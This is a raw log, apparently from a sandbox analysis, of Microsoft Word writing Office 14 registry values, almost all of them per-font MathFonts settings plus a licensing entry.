HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482637
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
C0AC079DA84B4CBD8DBAF1BB44146899
01000000270000007B39303134303030302D303033442D303030302D313030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
2904
